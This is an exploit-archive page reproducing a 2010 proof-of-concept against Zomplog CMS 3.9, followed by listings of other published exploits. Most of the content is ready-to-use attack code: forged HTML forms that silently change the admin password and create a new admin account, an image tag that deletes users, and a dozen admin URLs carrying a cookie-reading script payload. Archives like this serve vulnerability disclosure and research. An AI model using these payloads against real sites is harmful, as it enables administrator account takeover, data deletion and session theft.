Menu

Search for hundreds of thousands of exploits

"Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery"

Author

Exploit author

10n1z3d

Platform

Exploit platform

php

Release date

Exploit published date

2010-08-15

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
<!---
    Title: Zomplog CMS 3.9 Multiple XSS/CSRF Vulnerabilities
    Author: 10n1z3d <10n1z3d[at]w[dot]cn>
    Date: Sun 15 Aug 2010 04:33:33 PM EEST
    Vendor: http://www.zomp.nl/zomplog/
    Download: http://www.zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
--->

-=[ CSRF PoC 1 - Change Admin Password ]=-

    <html>
        <head>
            <title>Zomplog CMS 3.9 Multiple XSS/CSRF Vulnerabilities - Change Admin Password</title>
        </head>
        <body>
            <form name="csrrf" action="http://[domain]/admin/profile.php" method="post" >
                <!--- Edit these --->
                <input type="hidden" name="password" value="rootroot" />
                <input type="hidden" name="password2" value="rootroot" />
                <!--- Do not edit below --->
                <input type="hidden" name="name" value="root" />
                <input type="hidden" name="email" value="root@root.com" />
                <input type="hidden" name="address" value="" />
                <input type="hidden" name="zip" value="" />
                <input type="hidden" name="country" value="" />
                <input type="hidden" name="birthday" value="" />
                <input type="hidden" name="url" value="" />
                <input type="hidden" name="image" value="" />
                <input type="hidden" name="movie" value="" />
                <input type="hidden" name="about" value="" />
                <input type="hidden" name="interests" value="" />
                <input type="submit" name="Submit" value="Continue" />
            </form>
        </body>
    </html>
    
-=[ CSRF PoC 2 - Create Admin User ]=-

    <html>
        <head>
            <title>Zomplog CMS 3.9 Multiple XSS/CSRF Vulnerabilities - Create Admin User</title>
        </head>
        <body>
            <form name="csrf" action="http://[domain]/admin/users.php" method="post">
                <!--- Edit these --->
                <input type="hidden" name="login" value="root" />
                <input type="hidden" name="password" value="rootroot" />
                <input type="hidden" name="password2" value="rootroot" />
                <!--- Do not edit below --->
                <input type="hidden" name="admin" value="1" />
                <input type="submit" name="submit" value="Continue" />
            </form>
        </body>
    </html>
    
-=[ CSRF PoC 3 - Delete User ]=-
    
    <img src="http://[domain]/admin/schredder.php?tablename=zomplog_users&id=[user id here]" alt="Do you see this?" />
    
-=[ XSS PoCs ]=-

    http://[domain]/admin/users.php?message=<script>alert(document.cookie);</script>
    http://[domain]/admin/category.php?message=<script>alert(document.cookie);</script>
    http://[domain]/admin/entry.php?message=<script>alert(document.cookie);</script>
    http://[domain]/admin/newentry.php?message=<script>alert(document.cookie);</script>
    http://[domain]/admin/comments.php?message=<script>alert(document.cookie);</script>
    http://[domain]/admin/newpage.php?message=<script>alert(document.cookie);</script>
    http://[domain]/admin/page.php?message=<script>alert(document.cookie);</script>
    http://[domain]/admin/settings.php?message=<script>alert(document.cookie);</script>
    http://[domain]/admin/changeclothes.php?message=<script>alert(document.cookie);</script>
    http://[domain]/admin/settings_theme.php?message=<script>alert(document.cookie);</script>
    http://[domain]/admin/themes.php?message=<script>alert(document.cookie);</script>
    http://[domain]/admin/plugins.php?message=<script>alert(document.cookie);</script>
    
<!---
    http://www.evilzone.org/
    irc.evilzone.org  (6697 / 9999)
--->
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2010-08-26 "Hycus CMS 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-08-15 "Zomplog 3.9 - 'message' Cross-Site Scripting" webapps php 10n1z3d
2010-08-15 "Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php 10n1z3d
2010-07-15 "eXtreme Message Board 1.9.11 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-14 "ZenPhoto CMS 1.3 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-13 "Diferior CMS 8.03 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-12 "Campsite CMS 3.4.0 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-12 "Getsimple CMS 2.01 - Multiple Vulnerabilities" webapps php 10n1z3d
2010-07-12 "Grafik CMS 1.1.2 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-12 "TheHostingTool 1.2.2 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-11 "Mac's CMS 1.1.4 - 'SearchString' Cross-Site Scripting" webapps java 10n1z3d
2010-07-11 "TomatoCart 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-11 "Orbis CMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-11 "TomatoCMS 2.0.5 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-11 "Frog CMS 0.9.5 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-11 "Macs CMS 1.1.4 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php 10n1z3d
2010-07-10 "Elite CMS 1.01 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-10 "eliteCMS 1.01 - Multiple Cross-Site Scripting Vulnerabilities" webapps php 10n1z3d
2010-02-15 "superengine CMS (Custom Pack) - SQL Injection" webapps php 10n1z3d
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.